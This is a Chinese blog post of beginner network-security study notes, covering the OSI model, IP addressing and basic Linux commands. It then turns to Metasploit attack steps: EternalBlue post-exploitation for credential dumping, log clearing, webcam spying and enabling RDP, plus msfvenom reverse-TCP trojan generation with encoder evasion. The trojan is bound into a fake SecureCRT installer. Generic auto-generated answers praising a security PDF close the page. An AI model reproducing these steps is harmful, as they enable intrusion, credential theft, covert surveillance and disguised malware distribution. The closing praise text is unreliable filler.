网络安全笔记

1,网络
设备 链路
设备:网络设备(对外提供网络服务)   终端设备(使用网络服务)
路由器 交换机 防火墙      pc机,服务器
osi参考模型
开放系统互联的参考模型
iso:国际标准化组织
1.物理层:传输bit
2.数据链层
3.网络层
4.传输层
5.会话层
6.表示层
7.应用层
1-3 用户运用 4-7数据传输
物理层:提供传输bit的介质,定义数据传输方式
bit位 Byte字节 B=8b
1.双绞线(网线),抗干扰
 1五类线 100Mb/S,超五类,六类:1000Mb/S
 T568A:绿白,绿,橙白,蓝,蓝白,橙,棕白,棕

 T568B:橙白,橙,绿白,蓝,蓝白,绿,棕白,棕
2.信号传输方式
(1)单工模式:一方发送数据,另一方接受数据(空调,遥控器)
(2)半双工模式:在同一模式内,一方发送数据,另一方接受数据(对讲机)
 (3)全双工模式:双方可以同时发送和接受数据
2.数据链层(将数据变成数据帧传送到对端):物理编址,mac地址,总长48bit,12位十六进制数表示,mac地址全球唯一,终身不可变
前24bit表示oui(厂商),后24bit厂商自定义
每个网卡都有一个mac地址,ipcanfig/all
传输的是数据帧
DNS:域名解析
将域名解析成ip地址
需要依赖dns服务器工作的
公用dns:114.114.114.114
*****ping:表示探测的目标是否可达
    reply from:从目标收到回复
   request time out:超时,数据包发送,对方不回复
   Unreachable:可达,数据包不可以发送到终端
CDN(旁站)
3.网络层:1.提供逻辑编制(ip地址), 总成32bit,每8bit转换成十进制,中间用“”.“”来连接(点分十进制)
ip地址根据首字节判断类别
A:1-126 B128-191 C192-223 D224-239 E:240-255
127被保留,作为本地环回地址使用,用于测试本地地址网卡驱动程序是否正常工作
*****tracert:探测目标的路径

TTL:Time to live,数据包每经过一台设备,TTL就会-1,window的ttl初始默认为64
子网掩码
vmware1:仅主机模式,则只可以访问宿主机,不可以访问外部网络
vmware8:nat模式,当虚拟机网卡调整vmnet8后,可以借助宿主机网络访问外部网络
操作系统
wondows:适合新手,更面向个人用户 缺陷:1蓝屏,2不可以长时间待机
linux:开源且稳定;
Mac OS:苹果

shell(人机交互的接口)
 1GUI(图形化界面)
 2CLI(命令行接口):用这个人多
──(root㉿kali)-[~]
└─# 
root:用户名
k:分隔符无意义
kali:主机名
后面工作路径
基础命令:
1.whoami:查看用户名
2.pwd:打印工作路径
3.切换用户:
在linux有且只有两种用户
(1):普通用户
(2):超级管理员:root,尽量避免root来操作系统 (rm -rf /*删除所有)
su - 用户名(完全)
su 用户名(只是命令)
root 切其他直接 ,其他切换到root要密码
不要频繁使用su -不断产生子资源,占用资源
**history:之前所有命令
  exit:退出子进程
  ctrl+d :退出当前的shell对话
cd命令(change directory):切换更改路径
windows系统目录以盘开头
linux 系统目录以/开头
wireshark:一款网络工具,抓捕数据表
永恒之蓝:shell进入对方cmd
cmd: md 创造文件夹
net user 名字 /add :创造新用户del删除
获取密码:load kiwi     creds_all 2.hashdump(密文)
clearev:清空日志
screenshot:截图 screenshare视频看 webcam_stream webcam_snap
shutdown -a:取消 -r:重启 -s:关机
netstat -n:查看其他与自己电脑连接的ip
chcp 65001:消除乱码
上传 upload /目录 C://
下载 download c://名字 /目录
run post/manage/enable_rdp username=123 password 123
木马生成及其利用:
1关闭杀软
2在kali终端里用msf生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.113.128 -f exe -o text.exe
-p 指定payload类型,此处指定windows/meterpreterreverse_tcp
-f format 指的是输出格式类型
-o 输出木马文件名,此处payload.exe

  2  监听
use. exploit/multi/handler
pwd
ls
cat+文件名可以查看文件内容 
edit 编辑
del 删除
run post/windows/manage/migrate 躲避杀软
atp  install -y golang
binding权限
ls -s内容及其属性
chmod +x bindbing
./binding 查看binding使用方法
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.113.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o msf.exe
./binding msf.exe secure-CRT.exe secure-CRT.ico

  • 77
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: 千锋网络安全笔记是一份非常有价值的资料,其内容丰富、全面、详细。笔记共涵盖了网络安全领域的各个方面,包括网络安全基础知识、网络攻击与防御技术、安全测试工具及漏洞挖掘技术等。这些内容涵盖了安全行业的方方面面,对于想要深入学习和掌握网络安全知识的人来说具有非常高的参考价值。 此外,千锋网络安全笔记还采用了非常清晰的分类和编排方式,让读者可以方便地找到自己需要的资料和信息。笔记中使用图文并茂的方式对一些知识点进行了详细讲解,并且还提供了大量的案例分析和实战练习,帮助读者更好地理解和掌握所学内容。 因此,千锋网络安全笔记无论是对于想要从事网络安全行业的初学者,还是对于有一定经验的从业者来说,都具有非常重要的参考和学习价值。希望更多的人可以利用这份优质资源,不断提高自己的网络安全专业知识和技能,为网络安全事业的发展做出更为重要的贡献。 ### 回答2: 千锋网络安全笔记pdf是一本重要的网络安全学习资料。该笔记详细介绍了网络安全的相关知识,包括网络攻击类型、防范措施、网络安全评估等方面。这本笔记不仅适合安全从业人员,也适合网络管理员和想要了解网络安全知识的普通用户。 该笔记内容详实,涵盖了多个方面。它是一本非常全面的学习笔记,内容包括网络安全基础知识和实战技巧。它还提供了许多经典案例,方便读者了解实际安全攻击情况。 千锋网络安全笔记pdf的特点是结构清晰,语言简明易懂。该笔记采用了图文并茂的方式,以图示和实例等形式,使复杂的技术知识变得简单易懂。每个章节都有练习部分,方便读者检验所学知识,并加深理解。 总的来说,千锋网络安全笔记pdf是一本不可或缺的网络安全学习资料。它能够帮助读者深入了解网络安全,了解现代网络攻击的方式以及防范措施。不但适合初学者阅读,也适合资深专业人士查阅,是一本涵盖广泛的网络安全实战手册。 ### 回答3: 千锋网络安全笔记是千锋教育机构的一本网络安全入门读物,该笔记涵盖了许多网络安全基础知识,如网络攻击、网络防御、密码学、漏洞利用、Web安全等。同时,笔记也提供了一些实践操作,方便读者进行一些实际的网络安全练习。 该笔记分为多个章节,每个章节都涵盖了一个特定的主题,例如网络攻击和防御、密码学基础、网络架构和拓扑、Web安全等。每个章节都有比较系统的知识点和案例分析,能够帮助读者对网络安全有一个更全面的认识和了解。 另外,千锋网络安全笔记还提供了后续学习的参考资料和一些重要的网络安全术语和标准,读者可以通过笔记中的参考链接和书籍推荐进一步深入学习和掌握更高级的网络安全技能。 总的来说,千锋网络安全笔记是一本入门级别的网络安全读物,适合初学者阅读,也能够为职业技术人员提供一些参考和提醒。读者可以通过笔记掌握网络安全的基本概念和操作技巧,并能在实践中不断提高自己的网络安全知识和技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值